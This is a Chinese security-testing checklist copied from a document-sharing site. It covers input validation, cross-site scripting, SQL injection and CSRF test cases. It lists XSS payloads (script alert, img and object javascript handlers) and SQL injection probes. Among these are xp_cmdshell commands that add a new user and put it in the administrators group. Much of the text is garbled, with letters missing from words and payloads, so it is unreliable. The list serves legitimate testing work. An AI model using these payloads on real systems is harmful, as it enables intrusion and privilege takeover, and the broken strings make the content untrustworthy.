常用安全性测试用例

《常用安全性测试用例》由会员分享，可在线阅读，更多相关《常用安全性测试用例（15页珍藏版）》请在装配图网上搜索。

1、常用安全性测试用例安全性测试:建立整体的威胁模型，测试溢出漏洞、信息泄漏、错误处理、SL注入、身份验证和授权错误.1、输入验证客户端验证 服务器端验证（禁用脚本调试，禁用Cooki）.输入很大的数（如，294,9，269），输入很小的数（负数）2。输入超长字符，如对输入文字长度有限制,则尝试超过限制，刚好到达限制字数时有何反应3。输入特殊字符，如:！#*（）_：”|4。输入中英文空格，输入字符串中间含空格,输入首尾空格5输入特殊字符串NUL,nll，d0x0a6输入正常字符串7输入与要求不同类型的字符,如： 要求输入数字则检查正值，负值,零值（正零，负零）,小数，字母,空值;要求输入字母则检查

2、输入数字8。输入hml和jaasipt代码对于像回答数这样需检验数字正确性的测试点,不仅对比其与问题最终页的回答数，还要对回答进行添加删除等操作后查看变化例如:1输入html”h/tl，看是否出错;2。输入inp type=”textname”uer”/，看是否出现文本框；3输入scrittype=”textasipt”alert(“提示”）input/scipart(lo);1.jp onoseover=alert(x)/asciptaert(xss）;；alet(xss）；va/ a=”s=” ； =”；aler（/xs/）；/”img src=“输出内容”border=“0l=“loo”

3、/“”“”“ “”“ ”title=对输出数据到输出数据的对比，看是否出现问题.防止SQL注入dmn 。-. ad （) exe nsrt* % chrmdnd ;An 1 ; aNd 1= ；h(97)ch（110）ca（10） chr（9）ch（61）chr(4） ； %20AND%201=2and =;An 1=； aN 1；and=2 ; and 1=nd 2=and usr0and （sect out(）fm ssobjets）and (slctcut（*)om msysojc)0nd （Selec out（） frmAdmin）=0a （et tp 1en（ername） fom

4、Admi）0(senam 已知字段）;eec mast。.xp_chell“usr ame assword /dd”；execastr.。xp_cdshell“net loaloup e administraos/d”-an0(select ount（） from mi)简单的如were type=U,字符U对应的ASCII码是85,所以可以用here xype=chr（5)代替;如果字符是中文的,比如wen用户，可以用whe am=ncar(299）+nchar(143）代替。跨站脚本攻击（XSS）对于 XSS,只需检查 HT输出并看看您输入的内容在什么地方。它在一个 HREF 标记中吗？是

5、否在 IFAME 标记中?它在LSI 标记中吗？在 MG SRC 中吗?某些 lash 内容的 RAM NME是怎样的？!（)_+，。?;”-%3Cput /3E3scri%3Eal（XSS)3Ccrpt3Einu type=”tex/inpu/in/siptaert（xs）scritsciptaert（xs);let(xs)gsrc”/neo=alrt(/ss/)idth10=xssonmoueor=alert(hlo）;&alrt(hllo）;sciptart(XS）%227img%2sc%3%22jascipt:alet(%2XS27)22”objct typ=txt/html dat=

6、javasrt：alert(ode);/objetody nload”javascrp：aert（cde）”/dya?srtale（Vnerable)/scpt!：rom = $！rundata。Prameter。eSrin（fom);var from = ;hackerFunti(dcument。ook)；”；天津sriptert（”helo）&ni=MAPBTBRQMYWJRXPBX跨站请求伪造（SF）同个浏览器打开两个页面,一个页面权限失效后，另一个页面是否可操作成功。当页面没有CHKD时,查看页面源代码,查是是否有oken.如果页面完全是展示页面,是不会有tken的。文中如有不足，请您见谅！15 / 15